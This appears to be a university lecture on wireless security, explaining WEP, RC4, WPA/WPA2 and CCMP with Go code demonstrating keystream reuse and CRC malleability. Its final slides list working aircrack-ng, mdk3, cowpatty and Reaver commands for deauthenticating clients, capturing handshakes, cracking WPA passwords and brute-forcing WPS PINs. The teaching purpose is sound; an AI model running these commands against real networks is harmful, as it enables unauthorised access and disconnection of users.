Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities


Wireless Security Comp Sci 3600 Security


Wired versus wireless (Figure 24.1, Wireless Networking Components: endpoint and access point)

Locations and types of attack


Wired Equivalent Privacy (WEP)
Security algorithm for IEEE 802.11 wireless networks; part of the original 802.11 standard ratified in 1997.
WEP is recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits). It was at one time widely in use and was often the first security choice presented to users by router configuration tools.
C: encryption; I: data integrity check; A: passphrase authentication


WEP authentication
1 A wireless host requests authentication by an access point.
2 The access point responds to the authentication request with a 128-byte nonce value.
3 The wireless host encrypts the nonce using the symmetric key that it shares with the access point.
4 The access point decrypts the host-encrypted nonce.


RC4 (figure slides: RC4; RC4 encryption; RC4 decryption)

RC4 summary
1 First a 4-byte cyclic redundancy check value is computed for the data payload.
2 Key value: in this case the 64-bit (K_S, IV) key, where K_S is the 40-bit shared key and the IV is 24 bits.
3 The RC4 algorithm produces a stream of key values, k_1^IV, k_2^IV, k_3^IV, ..., that are used to encrypt the data and CRC value in a frame.

Encryption and decryption
Encryption is performed by XOR-ing the ith byte of data, d_i, with the ith key, k_i^IV, in the stream of key values generated by the (K_S, IV) pair to produce the ith byte of ciphertext, c_i:
c_i = d_i XOR k_i^IV
The IV value changes from one frame to the next and is included in plaintext in the header of each WEP-encrypted 802.11 frame (previous slide).
The receiver takes the secret 40-bit symmetric key that it shares with the sender, appends the IV, and uses the resulting 64-bit key (which is identical to the key used by the sender to perform encryption) to decrypt the frame:
d_i = c_i XOR k_i^IV


Flaw 1: keystream re-use
Proper use of the RC4 algorithm requires that the same 64-bit key value never be used more than once. Recall that the key changes on a frame-by-frame basis. For a given K_S (which changes rarely, if ever), this means that there are only 2^24 unique keys. If these keys are chosen randomly, the probability of having chosen the same IV value (and hence used the same 64-bit key) is more than 99 percent after only 12,000 frames. With 1 Kbyte frame sizes and a data transmission rate of 11 Mbps, only a few seconds are needed before 12,000 frames are transmitted. Since the IV is transmitted in plaintext in the frame, an eavesdropper will know whenever a duplicate IV value is used. Two frames that use the same IV likely use the same secret key and thus the same keystream.
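The encryption, decryption and flaw-1 steps above, as an added worked example in Go (this is my code, not the slides' or the course's; it uses only the Go standard library). It assumes a constructed 5-byte shared key and 3-byte IV and a simplified frame layout of IV || RC4(payload || ICV) with the ICV stored little-endian, not a complete 802.11 frame; the function names wepEncrypt, wepDecrypt and keystreamReuseLeak are mine.

```go
package main

import (
	"crypto/rc4"
	"encoding/binary"
	"fmt"
	"hash/crc32"
)

// xorSlices returns a XOR b over the shorter of the two lengths.
func xorSlices(a, b []byte) []byte {
	n := len(a)
	if len(b) < n {
		n = len(b)
	}
	out := make([]byte, n)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// perFrameKey is the 64-bit RC4 key the slide calls (K_S, IV): the 24-bit IV
// followed by the 40-bit shared secret.
func perFrameKey(iv, key []byte) []byte {
	return append(append([]byte{}, iv...), key...)
}

// wepEncrypt builds a simplified WEP frame body (constructed layout, not a full
// 802.11 frame): the IV in the clear, then RC4_{IV||K_S}(payload || ICV).
func wepEncrypt(key, iv, payload []byte) ([]byte, error) {
	if len(key) != 5 || len(iv) != 3 {
		return nil, fmt.Errorf("WEP-40 wants a 5-byte shared key and a 3-byte IV")
	}
	// Step 1: 4-byte CRC-32 over the payload (the ICV), stored little-endian here.
	icv := make([]byte, 4)
	binary.LittleEndian.PutUint32(icv, crc32.ChecksumIEEE(payload))
	plain := append(append([]byte{}, payload...), icv...)
	// Step 2: the per-frame key (K_S, IV) seeds RC4, which yields k_1^IV, k_2^IV, ...
	stream, err := rc4.NewCipher(perFrameKey(iv, key))
	if err != nil {
		return nil, err
	}
	// Step 3: c_i = d_i XOR k_i^IV over the data and the ICV.
	ct := make([]byte, len(plain))
	stream.XORKeyStream(ct, plain)
	return append(append([]byte{}, iv...), ct...), nil
}

// wepDecrypt reads the plaintext IV from the frame, rebuilds the same keystream
// from (K_S, IV), recovers d_i = c_i XOR k_i^IV and checks the ICV.
func wepDecrypt(key, frame []byte) (payload []byte, icvOK bool, err error) {
	if len(frame) < 3+4 {
		return nil, false, fmt.Errorf("frame too short for IV and ICV")
	}
	iv, ct := frame[:3], frame[3:]
	stream, err := rc4.NewCipher(perFrameKey(iv, key))
	if err != nil {
		return nil, false, err
	}
	plain := make([]byte, len(ct))
	stream.XORKeyStream(plain, ct)
	payload, icv := plain[:len(plain)-4], plain[len(plain)-4:]
	icvOK = binary.LittleEndian.Uint32(icv) == crc32.ChecksumIEEE(payload)
	return payload, icvOK, nil
}

// keystreamReuseLeak is flaw 1 from the eavesdropper's side. If two frames carry
// the same IV (visible in the clear) they were encrypted with the same keystream,
// so c1 XOR c2 = d1 XOR d2: the key cancels and the XOR of the two payloads
// (followed by the XOR of the two ICVs) is exposed without ever learning K_S.
func keystreamReuseLeak(frame1, frame2 []byte) ([]byte, bool) {
	if len(frame1) < 3 || len(frame2) < 3 || string(frame1[:3]) != string(frame2[:3]) {
		return nil, false // different IVs: nothing cancels
	}
	return xorSlices(frame1[3:], frame2[3:]), true
}

func main() {
	key := []byte{0x0A, 0x1B, 0x2C, 0x3D, 0x4E} // constructed 40-bit shared key
	iv := []byte{0x01, 0x02, 0x03}               // constructed 24-bit IV, reused below
	f1, _ := wepEncrypt(key, iv, []byte("attack at dawn."))
	f2, _ := wepEncrypt(key, iv, []byte("retreat at dusk"))
	d, ok, _ := wepDecrypt(key, f1)
	fmt.Printf("decrypted %q, ICV ok: %v\n", d, ok)
	leak, _ := keystreamReuseLeak(f1, f2)
	fmt.Printf("c1 XOR c2 = %x (equals d1 XOR d2 over the payload bytes)\n", leak)
}
```

keystreamReuseLeak never touches the key. Anything known about one frame's contents (protocol headers, fixed fields) then reveals the corresponding bytes of the other, which is why a 24-bit IV space was fatal at 802.11b frame rates.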

More flaws
The cyclic redundancy check is not cryptographically secure: an attacker who changes the encrypted content (e.g., substituting gibberish for the original encrypted data), computes a CRC over the substituted gibberish, and places the CRC into the frame can produce an 802.11 frame that will be accepted by the receiver.
Weak keys are often chosen.
The PRNG is bad too.
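The CRC flaw above, as an added example in Go (mine, not from the slides; standard library only): crcIsLinear checks the XOR identity that makes CRC-32 patchable, patchedICV computes the corrected check value from the original one and the change alone, and hmacDetectsFlip repeats the experiment with a keyed MAC, which is the property WPA/WPA2's MIC provides instead. The message, key and bit flip are constructed; HMAC-SHA256 is used as the contrasting keyed MAC because it is in the standard library, not because WEP's successors use it.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"fmt"
	"hash/crc32"
)

// xorSlices returns a XOR b (equal lengths assumed).
func xorSlices(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// crcOf is the 4-byte check WEP uses as its ICV.
func crcOf(b []byte) uint32 { return crc32.ChecksumIEEE(b) }

// crcIsLinear verifies the identity behind "CRC is not cryptographically secure":
// for equal-length m and d,
//     CRC32(m XOR d) == CRC32(m) XOR CRC32(d) XOR CRC32(0...0)
// The check value of a modified message is therefore a function of the ORIGINAL
// check value and the change alone; knowing m (or the key) is unnecessary.
func crcIsLinear(m, d []byte) bool {
	zero := make([]byte, len(m))
	return crcOf(xorSlices(m, d)) == crcOf(m)^crcOf(d)^crcOf(zero)
}

// patchedICV shows the consequence for WEP. A frame carries RC4(m || CRC(m)).
// Flipping the bits of d in the data part turns m into m XOR d; flipping the bits
// of CRC(d) XOR CRC(0) in the ICV part turns CRC(m) into CRC(m XOR d), so the
// receiver's check still passes. RC4 is XOR-based, so the flips pass straight
// through the encryption.
func patchedICV(originalICV uint32, d []byte) uint32 {
	zero := make([]byte, len(d))
	return originalICV ^ crcOf(d) ^ crcOf(zero)
}

// hmacTag is a keyed MAC; hmacDetectsFlip repeats the same bit flip against it.
// The tag of m XOR d cannot be derived from the tag of m without the key, so the
// modification is rejected. This is the property a MIC (WPA/WPA2) has and a CRC lacks.
func hmacTag(key, m []byte) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write(m)
	return mac.Sum(nil)
}

func hmacDetectsFlip(key, m, d []byte) bool {
	return !hmac.Equal(hmacTag(key, m), hmacTag(key, xorSlices(m, d)))
}

func main() {
	m := []byte("transfer $100 to account 7") // constructed plaintext
	d := make([]byte, len(m))
	d[10] = '1' ^ '9' // turns "$100" into "$900"
	fmt.Println("CRC linear:", crcIsLinear(m, d))
	fmt.Printf("patched ICV %08x, CRC(m XOR d) %08x\n", patchedICV(crcOf(m), d), crcOf(xorSlices(m, d)))
	fmt.Println("HMAC rejects the same flip:", hmacDetectsFlip([]byte("constructed key"), m, d))
}
```

The linearity is a property of every CRC, whatever the polynomial, so a longer CRC would not have fixed WEP; only a keyed integrity check does.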

Let's check out a practical attack using our Kali VMs
https://en.wikipedia.org/wiki/aircrack-ng
https://kalitutorials.wordpress.com/2014/07/10/wifi-hack-crack-wep-passwords-with-kali/
http://www.wirelesshack.org/step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html
https://www.hackingloops.com/crack-wep-wifi-using-kali-linux/
https://teachmehacking.com/aircrack-ng-hack-wifi/
http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/
https://lifehacker.com/5305094/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack


WPA and WPA2 WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2, which became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.


1 WPA-Personal: Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and small office networks and doesn't require an authentication server.
2 WPA-Enterprise: Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup, but provides additional security (e.g. protection against dictionary attacks on short passwords).
3 Wi-Fi Protected Setup (WPS): This is an alternative authentication key distribution method intended to simplify and strengthen the process, but which, as widely implemented, creates a major security hole via WPS PIN recovery.

After the PSK or 802.1X authentication, a shared secret key is generated, called the Pairwise Master Key (PMK). The PMK is derived from a password that is put through PBKDF2-SHA1 as the cryptographic hash function. In a pre-shared-key network, the PMK is actually the PSK. If an 802.1X EAP exchange was carried out, the PMK is derived from the EAP parameters provided by the authentication server.
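The PMK derivation above, as an added example in Go (mine, not course code; standard library only). PBKDF2 is written out rather than imported so that the iteration structure is visible; the parameters (HMAC-SHA1, the SSID as salt, 4096 iterations, 256-bit output) are the ones IEEE 802.11i specifies, and for passphrase "password" on SSID "IEEE" the result matches the test vector in the standard's Annex H. The second SSID in main is constructed.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// pbkdf2HMACSHA1 is PBKDF2 (RFC 2898 section 5.2) with HMAC-SHA1 as the PRF. For
// each output block i: U1 = PRF(P, S || INT(i)), U_j = PRF(P, U_{j-1}), and
// T_i = U1 XOR U2 XOR ... XOR Uc. The output is T_1 || T_2 || ... truncated to keyLen.
func pbkdf2HMACSHA1(password, salt []byte, iterations, keyLen int) []byte {
	hLen := sha1.Size
	blocks := (keyLen + hLen - 1) / hLen
	out := make([]byte, 0, blocks*hLen)
	for i := 1; i <= blocks; i++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(i >> 24), byte(i >> 16), byte(i >> 8), byte(i)}) // INT(i), big-endian
		u := mac.Sum(nil)
		t := append([]byte{}, u...)
		for j := 1; j < iterations; j++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// pmkFromPassphrase derives the WPA/WPA2-Personal PMK as IEEE 802.11i specifies:
// PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 256-bit output).
// In PSK mode this value IS the PSK; it only changes when the passphrase or SSID does.
func pmkFromPassphrase(passphrase, ssid string) []byte {
	return pbkdf2HMACSHA1([]byte(passphrase), []byte(ssid), 4096, 32)
}

// pmkHex is pmkFromPassphrase as a hex string, the form wpa_supplicant prints.
func pmkHex(passphrase, ssid string) string {
	return hex.EncodeToString(pmkFromPassphrase(passphrase, ssid))
}

func main() {
	fmt.Println("PMK(\"password\", \"IEEE\")    =", pmkHex("password", "IEEE"))
	fmt.Println("same passphrase, SSID HomeNet =", pmkHex("password", "HomeNet")) // constructed SSID
}
```

Two points a defender should take from it: the PMK is a pure function of passphrase and SSID, so once a 4-way handshake has been captured every candidate passphrase can be checked offline at a cost of 2 x 4096 HMAC-SHA1 calls, and a common SSID means precomputed tables (the rainbow-table option on a later slide) apply. Passphrase entropy and a non-default SSID are the mitigations in PSK mode; WPA-Enterprise removes the shared secret altogether.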

(PSK mode) [three figure slides]


TKIP (Temporal Key Integrity Protocol): The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet. This is used by WPA.
CCMP (CTR mode with CBC-MAC Protocol): The protocol used by WPA2, based on the Advanced Encryption Standard (AES) cipher along with strong message authenticity and integrity checking, is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA. Informal names are AES and AES-CCMP.

AES: CTR mode (nonce is IV here)

CBC-MAC: To calculate the CBC-MAC of message m, one encrypts m in CBC mode with a zero initialization vector, over the blocks m_1, m_2, ..., m_x, using a secret key k and a block cipher E.
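CTR mode and CBC-MAC from the two slides above, combined the way CCMP combines them, as an added example in Go (mine, not from the slides; standard library only). It is a simplified CCM: the MIC is a CBC-MAC with zero IV over a length block plus the zero-padded message, truncated to 64 bits, and message and MIC are then CTR-encrypted under the same key. Real CCMP also binds the nonce and frame header into the MAC input and formats its counter blocks exactly, which this omits. The key, counter block and messages are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// cbcMAC is the construction on the slide: encrypt the blocks m_1 ... m_x in CBC
// mode under key k with an all-zero IV and keep only the last ciphertext block.
// The input must already be a whole number of AES blocks (see macInput).
func cbcMAC(key, blocks []byte) ([]byte, error) {
	if len(blocks) == 0 || len(blocks)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("CBC-MAC input must be a non-empty multiple of %d bytes", aes.BlockSize)
	}
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	zeroIV := make([]byte, aes.BlockSize)
	out := make([]byte, len(blocks))
	cipher.NewCBCEncrypter(blk, zeroIV).CryptBlocks(out, blocks)
	return out[len(out)-aes.BlockSize:], nil
}

// macInput prepares a variable-length message for CBC-MAC the way CCM's first
// block does: a length block comes first, then the message zero-padded to a block
// boundary. Raw CBC-MAC without the length block is only safe for fixed-length input.
func macInput(msg []byte) []byte {
	padded := (len(msg) + aes.BlockSize - 1) / aes.BlockSize * aes.BlockSize
	out := make([]byte, aes.BlockSize+padded)
	binary.BigEndian.PutUint64(out[8:16], uint64(len(msg)))
	copy(out[aes.BlockSize:], msg)
	return out
}

// ctrXOR is AES in counter mode; ctr0 is the 16-byte initial counter block (the
// nonce). Encryption and decryption are the same XOR with E_k(ctr0), E_k(ctr0+1), ...
func ctrXOR(key, ctr0, data []byte) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	cipher.NewCTR(blk, ctr0).XORKeyStream(out, data)
	return out, nil
}

const micLen = 8 // CCMP truncates the CBC-MAC to a 64-bit MIC

// protect is a simplified CCM: MIC = CBC-MAC(length || msg), then CTR-encrypt msg || MIC.
func protect(key, ctr0, msg []byte) ([]byte, error) {
	mic, err := cbcMAC(key, macInput(msg))
	if err != nil {
		return nil, err
	}
	return ctrXOR(key, ctr0, append(append([]byte{}, msg...), mic[:micLen]...))
}

// unprotect decrypts and reports whether the MIC verifies. A receiver must discard
// the frame when ok is false: CTR mode alone gives no integrity, so without the MIC
// a bit flipped in the ciphertext flips the same bit in the plaintext unnoticed.
func unprotect(key, ctr0, ct []byte) (msg []byte, ok bool, err error) {
	if len(ct) < micLen {
		return nil, false, fmt.Errorf("ciphertext shorter than the MIC")
	}
	plain, err := ctrXOR(key, ctr0, ct)
	if err != nil {
		return nil, false, err
	}
	msg, mic := plain[:len(plain)-micLen], plain[len(plain)-micLen:]
	want, err := cbcMAC(key, macInput(msg))
	if err != nil {
		return nil, false, err
	}
	return msg, bytes.Equal(mic, want[:micLen]), nil
}

func main() {
	key := []byte("0123456789abcdef")  // constructed 128-bit temporal key
	ctr0 := []byte("nonce-0000000001") // constructed initial counter block
	ct, _ := protect(key, ctr0, []byte("CCMP: privacy and integrity"))
	msg, ok, _ := unprotect(key, ctr0, ct)
	fmt.Printf("%q MIC ok: %v\n", msg, ok)
	ct[0] ^= 0x01 // one bit flipped in transit
	msg, ok, _ = unprotect(key, ctr0, ct)
	fmt.Printf("%q MIC ok: %v (CTR let the flip through; the MIC caught it)\n", msg, ok)
}
```

The tamper test in main is the point: CTR alone is malleable, and only the MIC turns a flipped bit into a rejected frame. The same XOR structure is why a counter block must never repeat under one key; a repeated nonce leaks c1 XOR c2 = d1 XOR d2 exactly as the WEP IV collision did, which is the condition the KRACK item on a later slide forces.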


These come in two main categories:
1 Exploits on proper function which has been mis-managed by the user: weak password
2 Actual flaws/bugs to be exploited: WPA packet spoofing and decryption; WPS PIN recovery; MS-CHAPv2 design weakness; shared Group Temporal Key (GTK) flaw (hole196); lack of forward secrecy (e.g., no use of DH); predictable Group Temporal Key (GTK); KRACK attack (a replay attack)

Attack on weak passwords
1 Kick someone off their network
2 Capture the traffic when they perform their 4-way handshake, which contains a hash of the password
3 Crack the password offline using a dictionary, rainbow table, or brute force
https://geekviews.tech/aircrack-ng-tutorial/
https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

Attack on weak passwords
Setup and choose network:
airmon-ng start wlan0    # put wlan0 in monitor mode
airodump-ng wlan0mon     # check out networks
Capture traffic on network of interest:
airodump-ng -c 11 --bssid 00:07:26:47:B0:35 -w capfile wlan0mon    # capture traffic
Deauthenticate (kick off); these are ALTERNATIVES:
aireplay-ng --deauth 4 -a 00:07:26:47:B0:35 wlan0mon
mdk3 wlan0mon d -b 00:07:26:47:B0:35 -c 4
aireplay-ng --ignore-negative-one -0 10 -a <AP MAC> -c <Client MAC> wlan0mon
Crack capfile offline; these are ALTERNATIVES:
aircrack-ng -b 00:07:26:47:B0:35 capfile.cap -w /usr/share/john/password.lst    # dictionary
cowpatty -r acm_dictionary-01.cap -d dictionary_hash -s dictionary    # rainbow table
john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap    # brute force

Wifi Protected Setup
Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases.
When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately. Since the first half of the PIN consists of four digits (10,000 possibilities) and the second half has only three active digits (1,000 possibilities), at most 11,000 guesses are needed before the PIN is recovered.

Wifi Protected Setup attack software
Reaver (online/realtime attack): https://code.google.com/archive/p/reaver-wps/wikis/readme.wiki
Bully (online/realtime attack): https://null-byte.wonderhowto.com/how-to/hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/ and https://tools.kali.org/wireless-attacks/bully
Pixie (offline attack specific to some vendors), in combination with Reaver or Bully: https://github.com/wiire-a/pixiewps

Wifi Protected Setup: Reaver steps
ifconfig                  # see your interface name
airmon-ng start wlan0     # or your interface name
airodump-ng wlan0mon      # to see networks
wash -i wlan0mon          # to see WPS-enabled networks only
reaver -i wlan0mon --bssid 00:01:02:03:04:05    # the good stuff
# If you get rate-limited, there are many further options
# You can also change your MAC first, but it needs to be specified in Reaver execution as a flag